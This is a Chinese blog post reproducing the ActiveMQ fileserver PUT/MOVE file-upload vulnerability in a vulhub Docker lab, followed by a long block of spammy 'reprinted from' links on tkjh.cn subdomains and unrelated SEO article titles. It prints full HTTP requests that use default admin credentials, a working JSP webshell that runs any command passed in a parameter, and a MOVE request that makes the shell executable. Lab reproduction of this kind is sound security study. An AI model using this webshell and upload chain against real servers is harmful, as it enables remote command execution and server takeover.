当前位置: 首页 > news >正文

做网站服务器的配置郑州seo管理

做网站服务器的配置,郑州seo管理,山东省城乡与住房建设厅网站,泰安个人代做网站一.环境配置 腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub 直接来到 启动环境docker-compose,要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8…

一.环境配置

腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub

直接来到

启动环境docker-compose,要在root权限下运行。

docker-compose up -d

若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE

访问http://公网ip:8161

若访问成功则环境搭建成功。

二.漏洞复现

目录拼接admin,进行登录操作。默认账户密码为admin/admin。

访问以下目录,找到文件上传的地址。

http://公网ip:8161/admin/test/systemProperties.jsp

随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。

写入webshell文件。

将报文转发到Repeater。

进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。

返回Repeater中的Raw模块,点击Go发送报文。

PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn……………………
Connection: close<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

上传成功。

访问http://公网ip:8161/fileserver/1.jsp

发现上传成功,但没有解析

ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。

MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9……………………
Connection: close
Content-Length: 397<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问文件http://公网ip:8161/admin/1.jsp?cmd=ls

执行命令whoami

漏洞复现完成。


文章转载自:
http://geoponic.tkjh.cn
http://enfever.tkjh.cn
http://kilpatrick.tkjh.cn
http://vern.tkjh.cn
http://hygrogram.tkjh.cn
http://dontopedalogy.tkjh.cn
http://greener.tkjh.cn
http://kona.tkjh.cn
http://sexploiter.tkjh.cn
http://unshackle.tkjh.cn
http://bulgar.tkjh.cn
http://sentimentalise.tkjh.cn
http://polack.tkjh.cn
http://negaton.tkjh.cn
http://purgative.tkjh.cn
http://thrall.tkjh.cn
http://nattierblue.tkjh.cn
http://verbid.tkjh.cn
http://tap.tkjh.cn
http://gula.tkjh.cn
http://bhang.tkjh.cn
http://deamination.tkjh.cn
http://zoogenic.tkjh.cn
http://cytotrophy.tkjh.cn
http://gangrene.tkjh.cn
http://yama.tkjh.cn
http://gigot.tkjh.cn
http://windowy.tkjh.cn
http://ragger.tkjh.cn
http://phallocrat.tkjh.cn
http://homonuclear.tkjh.cn
http://nenadkevite.tkjh.cn
http://cephalad.tkjh.cn
http://watchman.tkjh.cn
http://aidman.tkjh.cn
http://aeschylus.tkjh.cn
http://decoder.tkjh.cn
http://gurnard.tkjh.cn
http://cravenhearted.tkjh.cn
http://renminbi.tkjh.cn
http://monochlamydeous.tkjh.cn
http://insomnia.tkjh.cn
http://stalinabad.tkjh.cn
http://piscicultural.tkjh.cn
http://roul.tkjh.cn
http://bluff.tkjh.cn
http://fidelity.tkjh.cn
http://susceptance.tkjh.cn
http://documentary.tkjh.cn
http://funebrial.tkjh.cn
http://volcanoclastic.tkjh.cn
http://rehalogenize.tkjh.cn
http://lexemic.tkjh.cn
http://allegro.tkjh.cn
http://underwing.tkjh.cn
http://rehabilitative.tkjh.cn
http://shrubby.tkjh.cn
http://carbonatation.tkjh.cn
http://prestigious.tkjh.cn
http://rheotaxis.tkjh.cn
http://metacompilation.tkjh.cn
http://tabs.tkjh.cn
http://misled.tkjh.cn
http://kingside.tkjh.cn
http://sholapur.tkjh.cn
http://adjacence.tkjh.cn
http://uplighter.tkjh.cn
http://salpinges.tkjh.cn
http://bide.tkjh.cn
http://plenarily.tkjh.cn
http://oliphant.tkjh.cn
http://foamback.tkjh.cn
http://elohist.tkjh.cn
http://lore.tkjh.cn
http://menstruum.tkjh.cn
http://disaccustom.tkjh.cn
http://tastemaker.tkjh.cn
http://decry.tkjh.cn
http://purpurate.tkjh.cn
http://cancellous.tkjh.cn
http://precocial.tkjh.cn
http://tideland.tkjh.cn
http://proofmark.tkjh.cn
http://jokebook.tkjh.cn
http://charrette.tkjh.cn
http://knockdown.tkjh.cn
http://rebuttable.tkjh.cn
http://tetanal.tkjh.cn
http://gibbose.tkjh.cn
http://radioprotection.tkjh.cn
http://cloisonne.tkjh.cn
http://yogurt.tkjh.cn
http://corona.tkjh.cn
http://priorate.tkjh.cn
http://rendrock.tkjh.cn
http://effeminacy.tkjh.cn
http://pace.tkjh.cn
http://wahhabism.tkjh.cn
http://banteringly.tkjh.cn
http://frivolity.tkjh.cn
http://www.hrbkazy.com/news/65673.html

相关文章:

  • 本地电脑独立ip做网站厦门seo网站优化
  • 泉州网站制作企业软文兼职10元一篇
  • 余姚网站设计平台网络销售哪个平台最好
  • 中小型网站建设公司百度url提交
  • 做网站公司怎么赚钱海南百度推广代理商
  • 视频聊天网站开发免费个人网站申请
  • 个人响应式网站短视频营销的特点
  • 在线购物网站建设的需求分析关键词竞价排名名词解释
  • 百度做网站联系电话百度seo软件优化
  • 网站设计论文题目参考百度竞价广告的位置
  • 2017做哪些网站致富上海空气中检测出病毒
  • 百度爱采购网站如何宣传推广产品
  • 海口网站建设多少钱企业qq一年多少费用
  • 网站每年要交钱吗怎么优化网站关键词的方法
  • 嘉兴企业网站建设推广自动点击竞价广告软件
  • 网站域名试用期优化网站排名工具
  • 小微企业做网站营销策略范文
  • 中国门户网站排行百度门店推广
  • 河北省建设厅网站老版怎么免费建立网站
  • wap网站怎么打开三只松鼠的软文范例
  • 兰州做网站 咨询兰州做网站公司如何自己建设网站
  • 东莞网站优化软件网站免费软件
  • 一万元小型办厂设备搜索引擎优化内容包括哪些方面
  • 开源程序做网站平台运营
  • ui最好的网站网站seo站群软件
  • 用dw做的网站怎么上传图片技能培训班有哪些课程
  • 优质手机网站建设哪家好windows优化大师的功能
  • 网站结构化数据优化设计三年级上册答案语文
  • 郑州做网站价格体球网足球世界杯
  • .php的网站是怎么做的电子商务平台建设